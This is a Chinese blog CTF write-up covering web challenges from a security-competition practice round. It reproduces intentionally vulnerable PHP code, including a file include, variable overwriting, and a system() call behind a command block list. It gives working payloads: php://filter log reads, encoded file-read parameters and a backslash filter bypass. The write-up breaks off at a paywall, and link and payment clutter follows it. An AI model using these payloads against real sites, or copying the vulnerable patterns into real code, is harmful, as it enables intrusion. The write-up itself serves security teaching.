某信息安全攻防大赛周周练考核(二) Writeup By 2ha0yuk7on

最新推荐文章于 2024-01-08 09:22:47 发布
原创 最新推荐文章于 2024-01-08 09:22:47 发布 · 2.1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #安全 #网络安全 #web安全

文章目录

Web

简单的web

PHP代码审计

<?php
    highlight_file(__FILE__);
    error_reporting(0);
    echo "try to read source ?action=";
    $action = $_GET['action'];
        if (isset($action)) {
   
   
            if (preg_match("/base|data|input|zip|zlib/i", $action)) {
   
   
                echo "<script>alert('you are A Hacker!!!')</script>";
            } else {
   
   
                include("$action");
            }
        }
?>

文件包含,但是过滤了很多关键字,常见的PHP伪协议无法使用。但是可以进行远程文件包含:

在这里插入图片描述

赛后看到还有一种解法,仍然可以通过PHP伪协议,通过ROT13编码包含Nginx日志文件找到flag路径,然后包含flag文件获得答案:

/?action=php://filter/read=string.rot13/resource=/var/log/nginx/access.log

你玩过2048吗

玩过,合成数字就行了。

在这里插入图片描述

查看Jscript代码,定位到关键逻辑:

在这里插入图片描述

当分数达到2048时,显示flag,直接运行Jscript代码即可:

confirm(Decode('l%C2%85%C2%94%C2%96%C2%97%C2%9A%C3%81%C3%A1%C3%87%C3%87%C3%8C%C2%9Fq%C2%9A%C3%83%C2%97id%C2%95%C2%94af%C2%97%C3%85%C2%98jgipj%C2%96%C3%89%C2%9Dne%C2%96%C2%97gh%C2%AF'));
// DASCTF{faff98ba631d015bc552791ed950f162}

在这里插入图片描述

EasyPhp-v2

右键查看源码,看到PHP代码:

<?php
	foreach ($_POST as $item => $value){
   
   
	    $$item=$$value;
	    $secret = $$item;
	}
	foreach ($_GET as $key => $value){
   
   
	    if ($key=='flag'){
   
   
	        $str=$value;
	        $$str=$secret;
	    }
	}
	if (isset($hehe)){
   
   
	    echo "<center>".$hehe."</center>";
	}
	//flag+flaag=DASCTF{XXXXXXX}
?>

考察变量覆盖漏洞,使用POST方式传入value为flag的键值对,使得flag比变量即flag的前半段赋给secret变量。再通过GET方式使得hehe变量的值等于secret,即flag变量,打印输出即可。

# GET
?flag=hehe
# POST
a=flag
a=fllag

black

主页啥也没有,view-source查看源代码,发现step.php页面。直接访问的话会快速跳转到black.php空白页面,这里如果查看源代码的话会发现还有一个EDG.php页面,访问之:

在这里插入图片描述

看到一个图片,查看源码,页面返回了图片文件的Base64编码:

在这里插入图片描述

关注到URL的参数如下:

/EDG.php?img=353736643331376136343537343637353531366433343364

发现该参数经过了两次Base64编码和两次十六进制编码,解码如下:

353736643331376136343537343637353531366433343364
# 十六进制解码
576d317a64574675516d343d
# 十六进制解码
Wm1zdWFuQm4=
# Base64解码
ZmsuanBn
# Base64解码
fk.jpg

将本页面EDG.php进行如上编码,传入img参数:

/EDG.php?img=3535366335363533353334353738373535313664333936613531353433303339

返回页面查看源代码,将返回数据进行Base64解码,得到EDG.php的源码:

<center>
<?php
	error_reporting(0);
	header('content-type:text/html;charset=utf-8');
	include("flag.php");//flag in flag.php
	$cmd = $_GET['cmd'];
	if (!isset($_GET['img'])) 
	    echo '<script language=javascript>window.location.href="EDG.php?img=353736643331376136343537343637353531366433343364"</script>';
	    $file = base64_decode(base64_decode(hex2bin(hex2bin($_GET['img']))));
	$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
	if (preg_match("/flag/i", $file)) {
   
   
	    echo 'ä½ æƒ³è¦flagï¼Ÿè¡Œï¼Œé‚£æˆ‘ç»™ä½ å§~';
	    echo '<script language=javascript>window.location.href="flag.php"</script>';
	} else {
   
   
	    $txt = base64_encode(file_get_contents($file));
	    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
	    echo "<br>";
	}
	if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|diff|file|echo|sh|'|\"|`|;|,|\\|xA0|{|}|[|]|-|<|>/i", $cmd)) {
   
   
	    echo("forbid ~");
	    echo "<br>";
	} else {
   
   
	    system($cmd);
	}?>

进行代码审计,可以通过GET方式的cmd参数进行命令执行,但是过滤了很多命令,使用反斜杠\绕过即可:

EDG.php?img=123&cmd=who\ami

在这里插入图片描述

sqlnm

本题可以参考我之前写的一篇Writeup:

某单位2021年CTF初赛Web4-Sqlnm_2ha0yuk7on.的博客-优快云博客

我当时是用SQL盲注直接解的,赛后发现其实本题应该后面还有一个Vim源码泄露,我也补充进之前这篇文章了,详情请移步观看。

WriteIt

主页啥也没有,查看robots.txt,发现oh_somesecret页面:

<?php
	highlight_file(__FILE__);
	class OhYouFindIt{
   
   
	    public $content = "Hello Hacker.<br>";
	    function __destruct(){
   
   
	        echo $this->content;
	    }
最低0.47元/天 解锁文章
[2021江西省高校组]wp
Huamang的博客
09-28 1475
easyphp 前端代码泄露 foreach ($_POST as $item => $value){ $$item=$$value; $secret = $$item; } foreach ($_GET as $key => $value){ if ($key=='flag'){ $str=$value; $$str=$secret; } } if (isset($hehe)){ echo "<center>"
ctf目复盘
萍水间人的小天地
04-07 3512
为了准备四月下旬的校, 豁出去了 2048 首先进去之后是这样一个界面 2048是我喜欢的一个游戏, 然后我女朋友把它玩到了2048, 却啥也没出现。。 网站做的很流畅, 但是我一点思路都没有 开始抓包 GTE请求 发现了一个ETag的东西, 怎么把其下载下来呢? response响应 怎么把它下载下来呢? ... 扫描后...
[青少年CTF]CheckMe06-07|PingMe02|2048|简简单单的目|BASE
明裕学长的博客
03-17 2239
得到提示flag2的压缩包密码为维码解开后在开头加上qsn即可拿到flag压缩包。在结合Free_File_Camouflage工具解开图片中的2.txt。之后对key.txt解密是盲文得到qsnCTF9999。将它复制到js在线运行一下弹窗获得flag维码在ps中按ctrl+i黑白反转。将中括号去掉然后结合python。第一个解出密码为qsnctf。另一张改高度得到 我沉醉了。使用字典对登录界面爆破。该使用万能密码即可。按照里面的提示去解密。
网络安全人才能力评估实践 Writeup By 2ha0yuk7on
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
11-23 1528
网络安全人才能力评估实践个人Writeup
青少年CTF-WEB-2048
m0_73734159的博客
11-19 3309
String.fromCharCode将Unicode 编码转换成字符串形式。一、有参数改参数的数值达到目规定的分数即可拿到flag。这道并没有说目通关即可获得flag,也并没有发现参数。、没有参数那么flag就是被编码了,找编码即可。所以这里猜测flag被编码了,就在源代码里面。alert是JavaScript的弹窗方法。针对这种游戏通关类目,常见的有两种情况。使用script标签将其作为JS代码执行。查看2048.js文件内容。
信息安全攻防大赛周周考核(一) Writeup By 2ha0yuk7on
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
11-24 1130
信息安全攻防大赛周周考核(一) Writeup By 2ha0yuk7on
九年级上册第章一元次方程周周及答案2精选.doc
09-26
1. 一元次方程的标准形式是 ax^2 + bx + c = 0,其中 a、b、c 是常数,a ≠ 0。根据韦达定理,如果 x1 和 x2 是方程的两个根,那么 x1 + x2 = -b/a,x1 * x2 = c/a。 在目1和5中,利用韦达定理求解两根之和。 ...
高一物理第一学期周周2.doc
08-19
- 物体在前2s向左运动,后2s向右,且t=2s时速度绝对值最大,距离O点最远(A、B、D选项正确,C选项错误)。 12. **位移-时间图像**: - I、II两条直线代表P、Q做匀速直线运动,因为位移与时间成正比(A选项正确)...
北师大版七年级数学上册周周及答案2精选.doc
09-26
这份资料是针对七年级学生设计的一份数学周周习,涵盖了负数、倒数、有理数的乘除运算、科学记数法以及绝对值等基础数学概念。以下是相关知识点的详细说明: 1. 倒数:目中提到了-1的倒数是-1,根据倒数的...
【无标
qq_17720023的博客
05-28 2648
CTFWriteUpWEB-2048 文章目录CTFWriteUpWEB-2048 打开URL进去后是2048小游戏 提示得到4096的方块即可获得flag哦 先查看一下源代码 这是一个JS写的游戏 查看一下JS源码 进去以后发现是乱码,用set character encoding插件,即可显示正常 可以直接看到flag ...
CTF(一)
Hack
11-18 7027
    进入夺旗页面,发现是一个js编写的2048游戏,但是感觉不是玩2048这么简单, 查看源码 &lt;!doctype html&gt; &lt;html lang="en"&gt; &lt;head&gt; &lt;meta charset="UTF-8"&gt; &lt;title&gt;
某行业_CTF部分Writeup
Keepb1ue的博客
01-12 8393
目录WEB简单的Web足迹NoRCEGiveMeSecretMisc不止止base64失眠的夜High quality men WEB 简单的Web <?php highlight_file(__FILE__); error_reporting(0); echo "try to read source ?action="; $action = $_GET['action']; if (isset($action)) { if (p
ctfshow 摆烂杯
zip471642048的博客
12-27 1515
这里写自定义目录标欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
CTF习-3day
ZhangAweio的博客
05-28 732
原来是这个:将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。这里多了一个 is_string 函数意思就是说必须为字符串,那么我们就不能用数组绕过了,我们可以考虑md5的碰撞。还让我达到2000分,做梦去吧,作为一个黑客,怎么能不修改源代码呢?首先看到的目,应该是一个 CVE 具体是啥,我也没见过,我去翻翻资料。
2023年磐石行动第三周
weixin_44394805的博客
06-26 619
那么就不能通过穿越目录的方式读取文件,同时如果文件名中包含flag,那么就会直接定位到flag.php,而没有flag才能显示文件内容,直接打开flag.php,因为flag是变量导致无法直接查看。010edit打开图片发现报错信息在chunk2,然后发现DAS间隔为2,通过python脚本提取。发现两次hex编码和两次base64编码,那么读一下EDG.php的源码。然后发现img这个参数特别像hex,那么通过大厨进行编码试试。发现EDG.php页面,访问一下,发现如下链接。发现step.php页面。
听鬼哥说虐心的2048简化过程
听鬼哥说故事
08-21 5011
从开发转到逆向破解,开始准备写博客后,朋友们说,想看一些好玩的游戏分析过程,简单一点,最好是会开发的人员能完成的,那么本篇就不讲反编译追踪代码实现方式了,写给一些开发者朋友来对自己喜欢的小软件进行破解。 在flappybird火了一阵子之后,又出来一些小游戏,使得部分人爱不释手,欲罢不能,在游戏出来以后,我也玩了好长一段时间了,看着空间里面整天有人晒着自己的得分,那么咱们就一起来看一下,如何实现
2048青少年CTFweb
weixin_73452725的博客
10-23 855
我们能看到有一个JS代码组成的2048也就是JavaScript然后查看这个2048.js。找到这个运行的JavaScript复制找到工具js在线运行工具。这个目我们能看到需要倍数达到2048。打开神器F12查看源码。
NSSCTF 2048
最新发布
weixin_74336671的博客
01-08 634
修改score>20000或者直接运行:(控制台输入)按F12查看网络,看到2048.js文件,打开。这道本身就是一个好玩的游戏,哈哈!
HNCTF——web方向部分
m0_60715541的博客
11-01 1973
这是这次分享的解的清单,主要是web的,等我啥时候有时间更新一波杂项的解。
22年度信息技术第周周解析
资源摘要信息: "22周周.rar" 从提供的文件信息中,我们可以得知这是一个名为“22周周”的压缩文件。尽管具体的文件内容没有详细描述,但从文件的命名规则来看,它很可能包含了一周竞相关的材料。例如...
评论 7
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

2ha0yuk7on.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值